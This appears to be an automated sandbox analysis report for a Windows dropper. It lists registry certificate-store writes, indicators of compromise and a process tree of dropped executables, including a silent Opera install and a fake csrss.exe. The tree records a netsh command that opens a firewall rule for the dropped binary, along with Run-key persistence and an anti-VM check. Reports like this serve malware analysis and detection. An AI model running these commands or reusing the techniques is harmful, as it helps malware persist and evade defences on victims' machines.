b7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e LBwQxwDDb7Gm8NbplPklj6ZO.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e LBwQxwDDb7Gm8NbplPklj6ZO.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e LBwQxwDDb7Gm8NbplPklj6ZO.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1700 powershell.exe 1700 powershell.exe 1348 forfiles.exe 1348 forfiles.exe 1700 powershell.exe 1348 forfiles.exe 1588 Process not Found 1588 Process not Found 4328 gpupdate.exe 4328 gpupdate.exe 2972 nsr981B.tmp 2972 nsr981B.tmp 2428 powershell.exe 2428 powershell.exe 4000 powershell.exe 4000 powershell.exe 2428 powershell.exe 4000 powershell.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5412 reg.exe 5412 reg.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5412 reg.exe 5412 reg.exe 5412 reg.exe 5412 reg.exe 5412 reg.exe 5412 reg.exe 5412 reg.exe 5412 reg.exe 5720 powershell.EXE 5720 powershell.EXE 5720 powershell.EXE 3768 reg.exe 3768 reg.exe 3768 reg.exe 4484 powershell.exe 4484 powershell.exe 4484 powershell.exe 5724 powershell.exe 5724 powershell.exe 5724 powershell.exe 5904 powershell.exe 5904 powershell.exe 5904 powershell.exe 2720 iEuELDL.exe 2720 iEuELDL.exe 2720 iEuELDL.exe 5864 powershell.exe 5864 powershell.exe 5864 powershell.exe 4980 powershell.EXE 4980 powershell.EXE 4980 powershell.EXE 2720 iEuELDL.exe 2720 iEuELDL.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 1800 jsc.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 1348 forfiles.exe Token: SeDebugPrivilege 1588 Process not Found Token: SeImpersonatePrivilege 1588 Process not Found Token: SeDebugPrivilege 4328 gpupdate.exe Token: SeImpersonatePrivilege 4328 gpupdate.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 4000 powershell.exe Token: SeDebugPrivilege 5720 powershell.EXE Token: SeDebugPrivilege 3768 reg.exe Token: SeDebugPrivilege 4484 powershell.exe Token: SeDebugPrivilege 5724 powershell.exe Token: SeDebugPrivilege 5904 powershell.exe Token: SeDebugPrivilege 2720 iEuELDL.exe Token: SeDebugPrivilege 5864 powershell.exe Token: SeDebugPrivilege 4980 powershell.EXE Token: SeDebugPrivilege 5976 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4172 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4956 wrote to memory of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 PID 4956 wrote to memory of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 PID 4956 wrote to memory of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 PID 4956 wrote to memory of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 PID 4956 wrote to memory of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 PID 4956 wrote to memory of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 PID 4956 wrote to memory of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 PID 4956 wrote to memory of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 PID 1800 wrote to memory of 1588 1800 jsc.exe 95 PID 1800 wrote to memory of 1588 1800 jsc.exe 95 PID 1800 wrote to memory of 1588 1800 jsc.exe 95 PID 1800 wrote to memory of 4328 1800 jsc.exe 98 PID 1800 wrote to memory of 4328 1800 jsc.exe 98 PID 1800 wrote to memory of 4328 1800 jsc.exe 98 PID 1800 wrote to memory of 2912 1800 jsc.exe 99 PID 1800 wrote to memory of 2912 1800 jsc.exe 99 PID 1800 wrote to memory of 688 1800 jsc.exe 102 PID 1800 wrote to memory of 688 1800 jsc.exe 102 PID 1800 wrote to memory of 688 1800 jsc.exe 102 PID 1800 wrote to memory of 3028 1800 jsc.exe 103 PID 1800 wrote to memory of 3028 1800 jsc.exe 103 PID 1800 wrote to memory of 3028 1800 jsc.exe 103 PID 3028 wrote to memory of 400 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 105 PID 3028 wrote to memory of 400 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 105 PID 3028 wrote to memory of 400 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 105 PID 3028 wrote to memory of 4664 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 106 PID 3028 wrote to memory of 4664 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 106 PID 3028 wrote to memory of 4664 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 106 PID 3028 wrote to memory of 1200 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 107 PID 3028 wrote to memory of 1200 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 107 PID 3028 wrote to memory of 1200 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 107 PID 1200 wrote to memory of 5020 1200 LBwQxwDDb7Gm8NbplPklj6ZO.exe 108 PID 1200 wrote to memory of 5020 1200 LBwQxwDDb7Gm8NbplPklj6ZO.exe 108 PID 1200 wrote to memory of 5020 1200 LBwQxwDDb7Gm8NbplPklj6ZO.exe 108 PID 1800 wrote to memory of 2672 1800 jsc.exe 109 PID 1800 wrote to memory of 2672 1800 jsc.exe 109 PID 1800 wrote to memory of 2672 1800 jsc.exe 109 PID 2672 wrote to memory of 4172 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 110 PID 2672 wrote to memory of 4172 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 110 PID 2672 wrote to memory of 4172 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 110 PID 2672 wrote to memory of 2972 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 117 PID 2672 wrote to memory of 2972 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 117 PID 2672 wrote to memory of 2972 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 117 PID 4172 wrote to memory of 180 4172 BroomSetup.exe 113 PID 4172 wrote to memory of 180 4172 BroomSetup.exe 113 PID 4172 wrote to memory of 180 4172 BroomSetup.exe 113 PID 180 wrote to memory of 4776 180 cmd.exe 116 PID 180 wrote to memory of 4776 180 cmd.exe 116 PID 180 wrote to memory of 4776 180 cmd.exe 116 PID 180 wrote to memory of 2884 180 cmd.exe 115 PID 180 wrote to memory of 2884 180 cmd.exe 115 PID 180 wrote to memory of 2884 180 cmd.exe 115 PID 3028 wrote to memory of 432 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 119 PID 3028 wrote to memory of 432 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 119 PID 3028 wrote to memory of 432 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 119 PID 3028 wrote to memory of 3548 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 120 PID 3028 wrote to memory of 3548 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 120 PID 3028 wrote to memory of 3548 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 120 PID 3548 wrote to memory of 2296 3548 assistant_installer.exe 121 PID 3548 wrote to memory of 2296 3548 assistant_installer.exe 121 PID 3548 wrote to memory of 2296 3548 assistant_installer.exe 121 PID 4328 wrote to memory of 1348 4328 gpupdate.exe 141 PID 1588 wrote to memory of 1700 1588 Process not Found 123 PID 4328 wrote to memory of 1348 4328 gpupdate.exe 141
Processes
-
C:\Users\Admin\AppData\Local\Temp\2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe"C:\Users\Admin\AppData\Local\Temp\2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Users\Admin\Pictures\EnYtZjFCPp0j2UWH9hAYujy0.exe"C:\Users\Admin\Pictures\EnYtZjFCPp0j2UWH9hAYujy0.exe"3⤵
- Executes dropped EXE
PID:1588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Users\Admin\Pictures\EnYtZjFCPp0j2UWH9hAYujy0.exe"C:\Users\Admin\Pictures\EnYtZjFCPp0j2UWH9hAYujy0.exe"4⤵
- Executes dropped EXE
PID:5412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5140
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5228
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5904
-
-
-
-
C:\Users\Admin\Pictures\EnX1aDs9Qrx52GFxCqLBYTqv.exe"C:\Users\Admin\Pictures\EnX1aDs9Qrx52GFxCqLBYTqv.exe"3⤵
- Executes dropped EXE
PID:4328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:1348
-
-
C:\Users\Admin\Pictures\EnX1aDs9Qrx52GFxCqLBYTqv.exe"C:\Users\Admin\Pictures\EnX1aDs9Qrx52GFxCqLBYTqv.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5404
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5152
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5724
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
PID:2008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5976
-
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4940
-
-
-
C:\Users\Admin\Pictures\lZLbbsT4K4VwlkfF9Pt10W9z.exe"C:\Users\Admin\Pictures\lZLbbsT4K4VwlkfF9Pt10W9z.exe"3⤵
- Executes dropped EXE
PID:2912
-
-
C:\Users\Admin\Pictures\6dkzyHLjiRtcVYQUfmU7QR1S.exe"C:\Users\Admin\Pictures\6dkzyHLjiRtcVYQUfmU7QR1S.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
PID:688
-
-
C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe"C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exeC:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2f0,0x300,0x6f999530,0x6f99953c,0x6f9995484⤵
- Executes dropped EXE
- Loads dropped DLL
PID:400
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LBwQxwDDb7Gm8NbplPklj6ZO.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LBwQxwDDb7Gm8NbplPklj6ZO.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4664
-
-
C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe"C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3028 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240112230922" --session-guid=807933f5-606a-4aa2-8f3a-a0da28cb802a --server-tracking-blob=Y2I1MTNjNmE3Mjc2NjZiNjkxOTRkMzk5YTgzZTc4MTU1YWIzYWRkMGI3MjI0MmRlNjYxMDFiM2YxYzAzNDcxZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTEwMDk1Ny42NDU0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3YzM0YzhlMS02NmY1LTQxN2MtODJhMC0zYTBmZTE1ZGMzYWQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=68050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exeC:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2f0,0x300,0x304,0x2d0,0x308,0x6e8a9530,0x6e8a953c,0x6e8a95485⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5020
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:432
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3548 -
